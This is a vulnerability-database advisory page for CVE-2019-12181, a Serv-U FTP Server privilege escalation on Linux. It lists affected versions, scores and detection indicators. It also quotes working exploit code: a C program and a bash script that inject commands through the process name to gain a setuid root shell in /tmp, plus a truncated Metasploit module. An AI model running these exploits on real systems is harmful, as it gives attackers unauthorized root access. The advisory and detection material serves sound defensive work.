CVE-2019-12181
published 2019-06-17CVE-2019-12181: A privilege escalation vulnerability exists in SolarWinds Serv-U before 15.1.7 for Linux.
PriorityP275high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
65.98%
99.2th percentile
A privilege escalation vulnerability exists in SolarWinds Serv-U before 15.1.7 for Linux.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solarwinds | serv-u_ftp_server | < 15.1.7 | 15.1.7 |
| solarwinds | serv-u_mft_server | < 15.1.7 | 15.1.7 |
Detection & IOCsextracted from sources · hover to see the quote
- →The Serv-U binary at /usr/local/Serv-U/Serv-U is setuid root; monitor for it being executed with the -prepareinstallation flag by non-root, non-installer users, which is the trigger for exploitation. ↗
- →Monitor process execution for /usr/local/Serv-U/Serv-U being launched with ARGV[0] containing shell metacharacters (semicolons, quotes) — a hallmark of the exploit injecting commands via the process name. ↗
- →Alert on creation of setuid files in /tmp (e.g., /tmp/sh) shortly after Serv-U process execution, as the exploit copies /bin/bash there and sets the setuid bit. ↗
- →Detect use of bash 'exec -a' with a crafted ARGV[0] containing semicolons and quotes passed to the Serv-U binary, which is the mechanism used by all known exploit variants. ↗
- →Monitor for random-named hidden files (dot-prefixed, alphanumeric) created in writable directories (e.g., /tmp) with setuid root permissions, consistent with the Metasploit module's payload drop pattern. ↗
- ·The vulnerability only affects Linux installations of Serv-U FTP Server prior to version 15.1.7; Windows installations are not affected. ↗
- ·Exploitation requires local access (an existing shell or meterpreter session) on the target system; this is a local privilege escalation, not a remote code execution. ↗
- ·The Metasploit module checks that the /tmp (or WritableDir) mount is not nosuid before proceeding; defenders should ensure /tmp is mounted nosuid as a mitigation. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)
exploitdb·2019-07-03·CVSS 8.8
CVE-2019-12181 [HIGH] Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)
Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Serv-U FTP Server prepareinstallation Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on systems running
Serv-U FTP Server versions prior to 15.1.7.
The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
in a call to `system()`, without validation, when invoked with
the `-prepareinstallation` flag, resulting in command execution
with root privileges.
This module has been tested successfully on Serv-U FTP Server
version 15.1.6 (x64) on Debian 9.6 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Guy Lev
Exploit-DB
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)
exploitdb·2019-06-18·CVSS 8.8
CVE-2019-12181 [HIGH] Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)
Serv-U FTP Server
#include
#include
int main()
{
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
// if execv is successful, we won't reach here
printf("ret val: %d errno: %d\n", ret_val, errno);
return errno;
}
Exploit-DB
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)
exploitdb·2019-01-13·CVSS 8.8
CVE-2019-12181 [HIGH] Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)
Serv-U FTP Server
# https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181
if ! test -u "/usr/local/Serv-U/Serv-U"; then
echo '[-] /usr/local/Serv-U/Serv-U is not setuid root'
exit 1
fi
echo "[*] Launching Serv-U ..."
/bin/bash -c 'exec -a "\";cp /bin/bash /tmp/sh; chown root /tmp/sh; chmod u+sx /tmp/sh;\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
if ! test -u "/tmp/sh"; then
echo '[-] Failed'
/bin/rm "/tmp/sh"
exit 1
fi
echo '[+] Success:'
/bin/ls -la /tmp/sh
echo "[*] Launching root shell: /tmp/sh"
/tmp/sh -p
Metasploit
Serv-U FTP Server prepareinstallation Privilege Escalation
metasploit
Serv-U FTP Server prepareinstallation Privilege Escalation
Serv-U FTP Server prepareinstallation Privilege Escalation
This module attempts to gain root privileges on systems running Serv-U FTP Server versions prior to 15.1.7. The `Serv-U` executable is setuid `root`, and uses `ARGV[0]` in a call to `system()`, without validation, when invoked with the `-prepareinstallation` flag, resulting in command execution with root privileges. This module has been tested successfully on Serv-U FTP Server version 15.1.6 (x64) on Debian 9.6 (x64).
http://packetstormsecurity.com/files/153333/Serv-U-FTP-Server-15.1.6-Privilege-Escalation.htmlhttp://packetstormsecurity.com/files/153505/Serv-U-FTP-Server-prepareinstallation-Privilege-Escalation.htmlhttps://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.htmlhttps://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htmhttps://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systemshttp://packetstormsecurity.com/files/153333/Serv-U-FTP-Server-15.1.6-Privilege-Escalation.htmlhttp://packetstormsecurity.com/files/153505/Serv-U-FTP-Server-prepareinstallation-Privilege-Escalation.htmlhttps://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.htmlhttps://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htmhttps://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems
2019-06-17
Published